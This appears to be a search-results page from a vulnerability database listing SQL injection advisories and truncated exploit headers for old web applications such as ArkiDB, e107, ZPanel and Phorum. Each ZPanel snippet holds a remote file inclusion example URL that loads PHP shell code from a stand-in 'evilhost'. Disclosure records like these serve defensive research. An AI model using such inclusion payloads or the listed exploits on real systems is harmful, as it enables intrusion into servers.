3968 matches found
Arki-DB 1.0 - 'catid' SQL Injection
ArkiDB SQL Injection's ArkiDB catid Ramote SQL Injection's ---------------------- Bug By Devil-00 [email protected] Whe Ar All Love Security4Arab For Ever S4a.cc ------------------------------------------------- Explorer Exploit By Devil-00 ------------------------------------------------- Greetz :...
SMB Registry : SQL7 Patches
The remote SQL server seems to be vulnerable to the SQL abuse vulnerability described in technet article Q256052. This problem allows an attacker who has to ability to execute SQL queries on this host to gain elevated privileges. OpenVAS Vulnerability Test $Id: smbmssql7.nasl 6056 2017-05-02...
VuBB Forum RC1 (m) Remote SQL Injection Exploit
No description provided by source. !/bin/env perl ------------------------------------------------------------ - VuBB RC1 SQL Injection .. By Devil-00 [email protected] - ! ==|| This Exploit Only When magicquotesgpc Is OFF ||== - Gr33tz :- - Abducter .. - Devil-00 .. SQL Injection F0und3r & Expl0ti...
e107 <= 0.6172 (resetcore.php) Remote SQL Injection Exploit
Exploit for linux platform in category remote exploits =========================================================== e107 = 0.6172 resetcore.php Remote SQL Injection Exploit =========================================================== ?php 0.27 18/10/2005 ---e017xpl.php e107 0.617 resetcore.php SQL...
CVE-2005-3076
Simplog 0.9.1 might allow remote attackers to execute arbitrary SQL commands or trigger SQL error messages via invalid 1 pid, 2 blogid, 3 cid, or 4 m parameters to archive.php, or the 5 blogid parameter to blogadmin.php...
Claroline e-Learning <= 1.6 Remote Hash SQL Injection Exploit (2)
Exploit for unknown platform in category web applications ================================================================= Claroline e-Learning \n"; print STDERR "Targets:\n1 - userInfo.php\n"; print STDERR "2 - exercisesdetails.php\n"; exit; if @ARGV 3 Usage; if @ARGV == 3 $host = @ARGV0; $path...
CVE-2005-1570
forum.asp in bttlxeForum 2.0 allows remote attackers to obtain full path information via a certain hex-encoded argument to the page parameter, possibly due to a SQL injection vulnerability...
PT-2005-2552 · Asp · Asp Virtual News Manager
Name of the Vulnerable Software and Affected Versions: ASP Virtual News Manager affected versions not specified Description: The issue allows remote attackers to execute arbitrary SQL commands via the password parameter in the admin login.asp file. This can be exploited by sending malicious input...
ZPanel <= 2.5 Remote SQL Injection Exploit
No description provided by source. Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10, remote - in ZPanel 2.0. exploit for v 2.0 http://localhost/zpanel/zpanel.php?page=http://evilhost/shell where http://evilhost/shell.php - evil php code...
ZPanel <= 2.5 Remote SQL Injection Exploit
Exploit for unknown platform in category web applications ========================================== ZPanel = 2.5 Remote SQL Injection Exploit ========================================== Tested and working /str0ke It is possible to include arbitrary file: local - in version ZPanel = 2.5 beta 10,...
[Full-Disclosure] Kernelpanik Labs Digest 2005-2
Hi, This is a email digest with security fails recently published by Kernelpanik Labs http://www.kernelpanik.org. paNews 2.0.4b ------------- Remote SQL injection and command execution. Spanish: http://www.kernelpanik.org/docs/kernelpanik/panews.txt cuteNews 1.3.6 -------------- Remote XSS and...
CVE-2004-1515
SQL injection vulnerability in 1 ttlast.php and 2 last10.php in vBulletin 3.0.x allows remote attackers to execute arbitrary SQL statements via the fsel parameter, as demonstrated using last.php...
CVE-2004-2062
SQL injection vulnerability in antiboard.php in AntiBoard 0.7.2 and earlier allows remote attackers to execute arbitrary SQL via the 1 threadid, 2 parentid, or 3 mode parameters...
PowerPortal 1.3 - SQL Injection
PowerPortal 1.3 - SQL Injection source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is...
PowerPortal 1.3 - SQL Injection
source: https://www.securityfocus.com/bid/11681/info PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerabilit...
Phorum 5.0.x - 'FOLLOW.php' SQL Injection
source: https://www.securityfocus.com/bid/11660/info Reportedly Phorum is affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitized user supplied URI input. This issue allows remote attackers to manipulate query logic, leading to...
PT-2004-2553 · Unknown · Password Protect
Name of the Vulnerable Software and Affected Versions: Password Protect affected versions not specified Description: The issue allows remote attackers to execute arbitrary SQL statements and bypass authentication. This can be achieved through various parameters and files, including 1 admin or Pas...
Comersus Cart 5.0 - SQL Injection
Comersus Cart 5.0 - SQL Injection source: https://www.securityfocus.com/bid/10824/info Comersus Cart is reportedly affected by a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameter input before using it in an SQL...
Jaws 0.20.30.4 - ControlPanel.php SQL Injection
Jaws 0.20.30.4 - ControlPanel.php SQL Injection source: https://www.securityfocus.com/bid/10826/info JAWS is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the controlpanel.php script due to a failure of the application to properly sanitize user-supplied URI...
CVE-2004-0543
Multiple SQL injection vulnerabilities in Oracle Applications 11.0 and Oracle E-Business Suite 11.5.1 through 11.5.8 allow remote attackers to execute arbitrary SQL procedures and queries...